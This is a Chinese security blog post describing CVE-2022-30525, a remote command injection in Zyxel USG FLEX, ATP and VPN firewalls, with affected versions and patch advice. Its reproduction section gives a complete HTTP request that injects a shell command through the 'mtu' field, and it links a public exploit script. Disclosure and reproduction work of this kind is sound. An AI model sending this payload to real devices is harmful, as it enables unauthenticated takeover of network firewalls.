【漏洞速递+检测脚本 | CVE-2022-30525】Zyxel USG FLEX 远程命令执行漏洞

admin 2022年5月15日01:07:39安全文章评论27 views1461字阅读4分52秒阅读模式

0x01 前言

    Rapid7 发现并报告了一个漏洞,该漏洞影响支持零接触配置 (ZTP) 的 Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和 USG FLEX 系列(包括 USG20-VPN 和 USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码.

    受影响的模型容易受到通过管理 HTTP 接口进行未经身份验证的远程命令注入的攻击。命令以nobody用户身份执行。此漏洞通过/ztp/cgi-bin/handlerURI 被利用,并且是将未经过滤的攻击者输入传递os.systemlib_wan_settings.pysetWanPortSt易受攻击的功能与命令相关联被调用。攻击者可以将任意命令注入到mtudata参数中。


0x02 影响范围

影响组件USG FLEX 100, 100W, 200, 500, 700USG20-VPN, USG20W-VPNATP 100, 200, 500, 700, 800固件版本ZLD5.10 thru ZLD5.21 Patch 1ZLD5.00 thru ZLD5.21 Patch 1ZLD5.10 thru ZLD5.21 Patch 1


0x03 漏洞复现

登录页面访问如下:

【漏洞速递+检测脚本 | CVE-2022-30525】Zyxel USG FLEX 远程命令执行漏洞

PAYLOAD:

POST /ztp/cgi-bin/handler HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Content-Type: application/jsonConnection: closeContent-Length: 130
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; ping ***.dnslog.cn;","data":"hi"}

【漏洞速递+检测脚本 | CVE-2022-30525】Zyxel USG FLEX 远程命令执行漏洞


脚本检测

【漏洞速递+检测脚本 | CVE-2022-30525】Zyxel USG FLEX 远程命令执行漏洞


参考Henry4E36师傅简单加了一些功能,写的比较菜就不放出来了【漏洞速递+检测脚本 | CVE-2022-30525】Zyxel USG FLEX 远程命令执行漏洞

有需要的可以去下载Henry4E36师傅的脚本:

https://github.com/Henry4E36/CVE-2022-30525


0x04 修复建议

尽快应用供应商补丁。如果可能,启用自动固件更新。禁用对系统管理 Web 界面的 WAN 访问


>精彩回顾<

干货 | 红队快速批量打点的利器

【干货】最全的Tomcat漏洞复现

{Vulhub漏洞复现(一)ActiveMQ}

{Vulhub漏洞复现(二) Apereo CAS}

Cobalt Strike免杀脚本生成器|cna脚本|bypassAV

xss bypass备忘单|xss绕过防火墙技巧|xss绕过WAF的方法

【贼详细 | 附PoC工具】Apache HTTPd最新RCE漏洞复现

干货 | 横向移动与域控权限维持方法总汇

干货 | 免杀ShellCode加载框架

【干货】phpMyAdmin漏洞利用汇总

【神兵利器 | 附下载】一个用于隐藏C2的、开箱即用的Tools

分享 | 个人渗透技巧汇总(避坑)笔记

【漏洞速递+检测脚本 | CVE-2022-30525】Zyxel USG FLEX 远程命令执行漏洞

关注我

获得更多精彩

【漏洞速递+检测脚本 | CVE-2022-30525】Zyxel USG FLEX 远程命令执行漏洞


坚持学习与分享!走过路过点个"在看",不会错过【漏洞速递+检测脚本 | CVE-2022-30525】Zyxel USG FLEX 远程命令执行漏洞

仅用于学习交流,不得用于非法用途

如侵权请私聊公众号删文

觉得文章不错给点个‘再看’吧

原文始发于微信公众号(渗透Xiao白帽):【漏洞速递+检测脚本 | CVE-2022-30525】Zyxel USG FLEX 远程命令执行漏洞

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月15日01:07:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【漏洞速递+检测脚本 | CVE-2022-30525】Zyxel USG FLEX 远程命令执行漏洞 https://cn-sec.com/archives/1007482.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: